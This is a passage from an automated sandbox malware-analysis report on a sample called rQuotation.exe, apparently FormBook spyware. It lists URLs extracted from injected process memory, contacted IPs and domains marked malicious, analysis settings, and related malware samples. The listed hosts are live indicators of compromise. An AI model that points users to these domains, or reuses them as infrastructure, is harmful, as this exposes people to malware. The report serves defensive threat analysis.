                                                                                                                                                  http://www.aihuzhibo.net/template/news/wandoujia/static/js/footer.fe363a40.jsNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    http://www.thetrees.netNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      http://www.aihuzhibo.net/template/news/wandoujia/static/js/pullup.jsNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                        		unknown
                                                                                                                                                        http://www.cryptomastery.netgAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          http://wws.rvrktllmcvl.com/lfp/44.htmlNETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                            		unknown
                                                                                                                                                            http://wwf.yelangzhibo.top/NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              http://www.seamarket.shopgAmAZOKQyy.exe, 00000006.00000002.3574569506.000000000554D000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                                		unknown
                                                                                                                                                                http://www.vetcbd.netNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                  		unknown
                                                                                                                                                                  http://www.xiangxiangzhibo.comNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                    		unknown
                                                                                                                                                                    http://www.xiyezhibo.com/bindingNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      http://wwh.tianshizhibo.top/NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                        		unknown
                                                                                                                                                                        http://www.mirenzhibo.net/agpez/45.htmlNETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                          		unknown
                                                                                                                                                                          http://www.propertyadvice.netgAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                            		unknown
                                                                                                                                                                            http://www.zixiuzhibo.netNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                              		unknown
                                                                                                                                                                              http://www.mirenzhibo.net/j/NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                		unknown
                                                                                                                                                                                http://m.cckx.com.cn/NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  http://www.mirenzhibo.net/ibsg/7132.html:;NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    http://www.mirenzhibo.net/imw/8.htmlNETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      http://www.aihuzhibo.net/template/news/wandoujia/static/js/nc.jsNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        http://www.qingjiezhibo.netNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          http://www.qigezhibo.netNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            http://www.eurosupport.netNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              http://www.ideasforlife.netNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                http://www.meikazhibo.comNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  http://www.mirenzhibo.net/b/5851.htmlNETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    http://www.mirenzhibo.net/uenlb/NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://wwd.shibazhibo.top/l/24.htmlNETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        http://www.babazhibo.netNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://wwd.cuxqy.com/NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://www.firstevent.netNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              http://www.mirenzhibo.net/z/2273.htmlNETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                http://www.mengyouzhibo.netNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                  http://www.theanchorage.netNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                    http://www.baobaozhibo.netNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                                      http://www.mirenzhibo.net/euvch/6919.htmlNETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                                        http://www.mirenzhibo.net/xalca/75688.htmlNETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                                          http://wwf.qqai98.cn/NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                                            http://www.mirenzhibo.net/lgune/678.htmlNETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                                              http://www.mirenzhibo.net/kjfa/69323.htmlNETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                                http://www.tendinite.netNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                                  http://wwa.niunaizhibo.cn/NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                                    http://wws.moxiuzhibo.cc/NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                                                      http://wwg.xinxingzhibo.net/NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                                                        http://www.jingmeizhibo.netNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                                                          http://www.summergames.netNETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                                                            http://wwj.qsnjtjyw.cn/e/9.htmlNETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                              		unknown

                                                                                                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                                                                                                              Public IPs

                                                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                              192.30.252.154
                                                                                                                                                                                                                                              		www.llmsforrobot.xyzUnited States
                                                                                                                                                                                                                                              		36459GITHUBUStrue
                                                                                                                                                                                                                                              103.106.67.112
                                                                                                                                                                                                                                              		www.furrcali.xyzNew Zealand
                                                                                                                                                                                                                                              		56030VOYAGERNET-AS-APVoyagerInternetLtdNZtrue
                                                                                                                                                                                                                                              209.74.79.40
                                                                                                                                                                                                                                              		www.yous.websiteUnited States
                                                                                                                                                                                                                                              		31744MULTIBAND-NEWHOPEUStrue
                                                                                                                                                                                                                                              202.95.11.110
                                                                                                                                                                                                                                              		www.mirenzhibo.netSingapore
                                                                                                                                                                                                                                              		64050BCPL-SGBGPNETGlobalASNSGtrue
                                                                                                                                                                                                                                              199.59.243.227
                                                                                                                                                                                                                                              		94950.bodis.comUnited States
                                                                                                                                                                                                                                              		395082BODIS-NJUSfalse
                                                                                                                                                                                                                                              192.186.58.31
                                                                                                                                                                                                                                              		www.aihuzhibo.netUnited States
                                                                                                                                                                                                                                              		132721PING-GLOBAL-ASPingGlobalAmsterdamPOPASNNLtrue
                                                                                                                                                                                                                                              52.223.13.41
                                                                                                                                                                                                                                              		www.techforcreators.liveUnited States
                                                                                                                                                                                                                                              		8987AMAZONEXPANSIONGBtrue
                                                                                                                                                                                                                                              185.68.108.243
                                                                                                                                                                                                                                              		accusolution.proSpain
                                                                                                                                                                                                                                              		201446PROFESIONALHOSTINGEStrue

                                                                                                                                                                                                                                              General Information

                                                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                              Analysis ID:1579601
                                                                                                                                                                                                                                              Start date and time:2024-12-23 04:06:24 +01:00
                                                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                              Overall analysis duration:0h 8m 21s
                                                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                              Run name:Run with higher sleep bypass
                                                                                                                                                                                                                                              Number of analysed new started processes analysed:7
                                                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                                                              Number of injected processes analysed:2
                                                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                                                              Sample name:rQuotation.exe
                                                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@5/1@13/8
                                                                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                                                                              • Successful, ratio: 80%
                                                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                                                              • Successful, ratio: 89%
                                                                                                                                                                                                                                              • Number of executed functions: 16
                                                                                                                                                                                                                                              • Number of non-executed functions: 331
                                                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                                                                                                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                                                                                                                                                              • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                                                                                                                                                                                                              Warnings

                                                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
                                                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                                              Simulations

                                                                                                                                                                                                                                              Behavior and APIs

                                                                                                                                                                                                                                              No simulations

                                                                                                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                                                                                                              IPs

                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                              192.30.252.154http://sniff.su/Intercepter-NG.v1.3.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • sniff.su/Intercepter-NG.v1.3.zip
                                                                                                                                                                                                                                              103.106.67.112PO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • www.furrcali.xyz/86f0/
                                                                                                                                                                                                                                              Viridine84.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                                              • www.sailforever.xyz/p4rk/
                                                                                                                                                                                                                                              Doc 784-01965670.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • www.sailforever.xyz/hshp/
                                                                                                                                                                                                                                              BL.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • www.sailforever.xyz/hshp/
                                                                                                                                                                                                                                              BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • www.sailforever.xyz/hshp/
                                                                                                                                                                                                                                              209.74.79.40PO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • www.unlimitu.website/b4eq/
                                                                                                                                                                                                                                              CJE003889.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • www.balanpoint.life/0cbv/
                                                                                                                                                                                                                                              202.95.11.110z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • www.mirenzhibo.net/h075/
                                                                                                                                                                                                                                              199.59.243.227https://tfsroanoke.com/home/tfs/public_html/new/ckfinder/userfiles/files/12719803849.pdfGet hashmaliciousPDFPhishBrowse
                                                                                                                                                                                                                                              • ww25.crewmak.ru/_tr
                                                                                                                                                                                                                                              htkeUc1zJ0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • ww7.cutit.org/oxgBR?usid=27&utid=9975975645
                                                                                                                                                                                                                                              DHL.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • www.969-usedcar02.shop/cfcv/
                                                                                                                                                                                                                                              z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • www.sorket.tech/ul4e/
                                                                                                                                                                                                                                              236236236.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • survey-smiles.com/
                                                                                                                                                                                                                                              HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                              • ww7.przvgke.biz/aikqer?usid=23&utid=8062768193
                                                                                                                                                                                                                                              Payment Copy #190922-001.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • www.deadshoy.tech/0sq9/
                                                                                                                                                                                                                                              new.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • www.vavada-official.buzz/emhd/
                                                                                                                                                                                                                                              PO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • www.sob.rip/tp8k/
                                                                                                                                                                                                                                              SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                                                                                                                                                              • ww1.hbohbomax.com/

                                                                                                                                                                                                                                              Domains

                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                              94950.bodis.comPayment Copy #190922-001.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • 199.59.243.227
                                                                                                                                                                                                                                              new.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • 199.59.243.227
                                                                                                                                                                                                                                              PO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • 199.59.243.227
                                                                                                                                                                                                                                              ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • 199.59.243.227
                                                                                                                                                                                                                                              SHIPPING DOC.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • 199.59.243.227
                                                                                                                                                                                                                                              Purchase order MIPO2425110032.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • 199.59.243.227
                                                                                                                                                                                                                                              PI916810.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • 199.59.243.227
                                                                                                                                                                                                                                              SALES ORDER875.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • 199.59.243.227
                                                                                                                                                                                                                                              Invoice & Packing list For Sea Shipment.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • 199.59.243.227
                                                                                                                                                                                                                                              Invoice Packing list For Sea Shipment.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • 199.59.243.227
                                                                                                                                                                                                                                              www.mirenzhibo.netz1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • 202.95.11.110
                                                                                                                                                                                                                                              www.furrcali.xyzPO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • 103.106.67.112

                                                                                                                                                                                                                                              ASNs

                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                              BCPL-SGBGPNETGlobalASNSG3.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 137.220.247.57
                                                                                                                                                                                                                                              MicrosoftEdgeUpdateSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 134.122.134.93
                                                                                                                                                                                                                                              SWIFT COPY.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • 134.122.191.187
                                                                                                                                                                                                                                              http://93287.mobiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 137.220.229.108
                                                                                                                                                                                                                                              T2dvU8f2xg.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 118.107.29.172
                                                                                                                                                                                                                                              oiBxz37xUo.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 118.107.29.172
                                                                                                                                                                                                                                              T2dvU8f2xg.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 118.107.29.172
                                                                                                                                                                                                                                              oiBxz37xUo.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 118.107.29.172
                                                                                                                                                                                                                                              7nJ9Jo78Vq.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 118.107.29.172
                                                                                                                                                                                                                                              VJQyKuHEUe.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 27.50.63.8
                                                                                                                                                                                                                                              VOYAGERNET-AS-APVoyagerInternetLtdNZPO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • 103.106.67.112
                                                                                                                                                                                                                                              na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 202.154.136.19
                                                                                                                                                                                                                                              sora.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                              • 202.154.140.249
                                                                                                                                                                                                                                              loligang.mips-20241128-1536.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                              • 114.23.255.61
                                                                                                                                                                                                                                              Viridine84.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                                              • 103.106.67.112
                                                                                                                                                                                                                                              sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                              • 111.65.234.249
                                                                                                                                                                                                                                              la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 114.23.128.23
                                                                                                                                                                                                                                              la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                              • 111.65.234.209
                                                                                                                                                                                                                                              Doc 784-01965670.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                              • 103.106.67.112
                                                                                                                                                                                                                                              BL.exeGet hashmaliciousFormBookBrowse
